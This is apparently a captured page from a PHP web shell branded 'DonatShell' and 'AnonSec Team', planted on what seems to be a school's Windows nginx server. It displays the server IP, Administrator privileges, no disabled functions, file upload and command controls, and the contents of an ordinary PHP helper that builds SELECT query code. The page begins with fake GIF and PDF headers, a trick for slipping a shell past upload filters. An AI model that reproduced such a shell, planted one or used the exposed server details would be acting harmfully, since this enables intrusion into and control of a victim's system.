GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /nginx/html/JimMartinson/CST2146/_Archive/_info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /nginx/html/JimMartinson/CST2146/_Archive/_info/infoSELECT.phpinc
<?
// infoSELECT.phpinc
$query="SHOW COLUMNS FROM ".$table;
$fieldList = query_do($query,__FILE__,__LINE__);
$fieldCount = $_SESSION['mysql_num_rows'];
$isAlpha = array('date', 'time', 'year', 'char', 'blob', 'text', 'enum', 'set');
include('infoMenu.phpinc');
?>
<table><tr><td>
<p><fieldset><legend><?=$table?> SELECT</legend>
<form><textarea style="height:600px; width:978px;" wrap="off">
&lt;?
<?
$query = "\$query = \"\nSELECT"."\n";
$querytable = "\$query = \"\nSELECT"."\n";
mysql_data_seek($fieldList, 0);
while ($row = mysql_fetch_assoc($fieldList)) {
	$query .= "&nbsp; ".$row['Field'].",\n";
	$querytable .= "&nbsp; ".$table.'.'.$row['Field'].",\n";
}
$query = substr($query,0,strlen($query)-2)."\n"."FROM ".$table."\n";
$querytable = substr($querytable,0,strlen($querytable)-2)."\n"."FROM ".$table."\n";
include('infoWHERE.phpinc');
$query .= "ORDER BY ".$orderBy."\n";
$querytable .= "ORDER BY ".$table.'.'.$orderBy."\n";
$query .= "\";"."\n";
$querytable .= "\";"."\n";
echo $query."\n";
echo "\$".$table."List = query_do(\$query,__FILE__,__LINE__);"."\n";
echo "\$".$table."Count = \$_SESSION['mysql_num_rows'];"."\n";
echo "if (\$".$table."Count) {\n";
echo "&nbsp; \$".$table."Info = mysql_fetch_assoc(\$".$table."List);\n";
echo "&nbsp; mysql_data_seek(\$".$table."List, 0);"."\n";
echo "&nbsp; while (\$".$table."Info = mysql_fetch_assoc(\$".$table."List)) {"."\n";
echo "&nbsp; }"."\n";
echo "} else {\n";
echo "}"."\n";
echo "?&gt;\n\n";
echo "&lt;?\n";
echo $querytable;
?>
?&gt;
</textarea></form>
</fieldset></p>
</td></tr></table>

Anon7 - 2022
AnonSec Team